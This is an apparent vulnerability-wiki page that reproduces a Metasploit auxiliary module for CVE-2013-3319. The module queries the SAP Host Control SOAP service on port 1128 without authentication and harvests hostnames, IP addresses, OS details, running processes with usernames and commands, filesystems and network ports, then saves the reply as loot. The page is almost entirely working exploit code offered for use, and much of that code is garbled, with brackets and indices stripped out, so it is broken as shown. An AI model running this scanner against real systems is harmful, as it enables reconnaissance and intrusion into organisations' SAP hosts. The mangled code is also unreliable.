免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
EXP
require 'msf/core'
require 'rexml/document'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'SAP Host Agent Information Disclosure',
'Description' => %q{
This module attempts to retrieve Computer and OS info from Host Agent
through the SAP HostControl service
},
'References' =>
# General
'CVE', '2013-3319',
'URL', 'https://service.sap.com/sap/support/notes/1816536' ,
'URL', 'http://labs.integrity.pt/advisories/cve-2013-3319/'
,
'Author' =>
'Bruno Morisson <bmatintegrity.pt>'
,
'License' => MSF_LICENSE
)
register_options(
Opt::RPORT(1128)
, self.class)
register_autofilter_ports( 1128 )
deregister_options('RHOST')
deregister_options('VHOST')
end
def run_host(rhost)
rport = datastore'RPORT'
print_status("Connecting to SAP Host Control SOAP Interface on #{rhost}:#{rport}")
success = false
fault = false
data = '<?xml version="1.0" encoding="utf-8"?>'
data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
data << 'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">'
data << '<SOAP-ENV:Header><sapsess:Session xlmns:sapsess="http://www.sap.com/webas/630/soap/features/session/">'
data << '<enableSession>true</enableSession></sapsess:Session></SOAP-ENV:Header><SOAP-ENV:Body>'
data << '<ns1:GetComputerSystem xmlns:ns1="urn:SAPHostControl"><aArguments><item>'
data << '<mKey>provider</mKey><mValue>saposcol</mValue></item></aArguments></ns1:GetComputerSystem>'
data << "</SOAP-ENV:Body></SOAP-ENV:Envelope>\r\n\r\n"
begin
res = send_request_raw({
'uri' => "/#{datastore'URI'}",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'SOAPAction' => '""',
'Content-Type' => 'text/xml; charset=UTF-8',
}
}, 15)
if res and res.code == 200
print_good("Got response from server, parsing...")
env =
saptbl =
totalitems=0
saptbl0 = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "Remote Computer Listing",
'Prefix' => "\n",
'Postfix' => "\n",
'Indent' => 1,
'Columns' =>
"Names",
"Hostnames",
"IPAddresses"
)
saptbl1 = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "Remote OS Listing",
'Prefix' => "\n",
'Postfix' => "\n",
'Indent' => 1,
'Columns' =>
"Name",
"Type",
"Version",
"TotalMemSize",
"Load Avg 1m",
"Load Avg 5m",
"Load Avg 15m",
"CPUs",
"CPU User",
"CPU Sys",
"CPU Idle"
)
saptbl2 = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "Remote Process Listing",
'Prefix' => "\n",
'Postfix' => "\n",
'Indent' => 1,
'Columns' =>
"Name",
"PID",
"Username",
"Priority",
"Size",
"Pages",
"CPU",
"CPU Time",
"Command"
)
saptbl3 = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "Remote Filesystem Listing",
'Prefix' => "\n",
'Postfix' => "\n",
'Indent' => 1,
'Columns' =>
"Name",
"Size",
"Available",
"Remote"
)
saptbl4 = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "Network Port Listing",
'Prefix' => "\n",
'Postfix' => "\n",
'Indent' => 1,
'Columns' =>
"ID",
"PacketsIn",
"PacketsOut",
"ErrorsIn",
"ErrorsOut",
"Collisions"
)
mxml = REXML::Document.new(res.body)
itsamcs = mxml.elements.to_a("//mProperties/") # OS info
itsam = mxml.elements.to_a("//item/mProperties/") # all other info
itsamcs.each { |name|
tbl =
body =
body = "#{name}"
env = body.scan(/<item><mName>(.+?)<\/mName><mType>(.+?)<\/mType><mValue>(.+?)<\/mValue><\/item>/ix)
if env
totalitems +=1
case "#{env}"
when /ITSAMComputerSystem/
env.each do |m|
tbl << "#{m2}" unless ("#{m}" =~ /ITSAM/)
end
saptbl0 << tbl0, tbl1, tbl2
success = true # we have at least one response
end
end
}
itsam.each { |name|
tbl =
body =
# some items have no <mValue>, so we put a dummy with nil
body = "#{name}".gsub(/\/mType><\/item/,"\/mType><mValue>(nil)<\/mValue><\/item")
env = body.scan(/<item><mName>(.+?)<\/mName><mType>(.+?)<\/mType><mValue>(.+?)<\/mValue><\/item>/ix)
if env
totalitems +=1
env.each do |m|
tbl << "#{m2}" unless ("#{m}" =~ /ITSAM/)
end
case "#{env}"
when /ITSAMOperatingSystem/
saptbl1 << tbl0, tbl1, tbl2, tbl8, tbl11,tbl12,tbl13,tbl17,tbl18+'%',tbl19+'%',tbl20+'%'
success = true # we have at least one response
when /ITSAMOSProcess/
saptbl2 << tbl0, tbl1, tbl2, tbl3, tbl4,tbl5,tbl6+'%',tbl7,tbl8
success = true # we have at least one response
when /ITSAMFileSystem/
saptbl3 << tbl0, tbl2, tbl3, tbl4
success = true # we have at least one response
when /ITSAMNetworkPort/
saptbl4 << tbl0, tbl1, tbl2, tbl3, tbl4, tbl5
success = true # we have at least one response
end
end
}
elsif res and res.code == 500
case res.body
when /<faultstring>(.*)<\/faultstring>/i
faultcode = $1.strip
fault = true
end
end
rescue ::Rex::ConnectionError
print_error("Unable to connect to #{rhost}:#{rport}")
return
end
if success
print_good("#{totalitems} items listed")
saptbl.each do |t|
print(t.to_s)
end
p = store_loot(
"sap.getcomputersystem",
"text/xml",
rhost,
res.body,
"sap_getcomputersystem.xml",
"SAP GetComputerSystem XML"
)
print_status("Response stored in: #{p}")
return
elsif fault
print_error("#{rhost}:#{rport} - Error code: #{faultcode}")
return
else
print_error("#{rhost}:#{rport} - Failed to parse list")
return
end
return
end
end
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
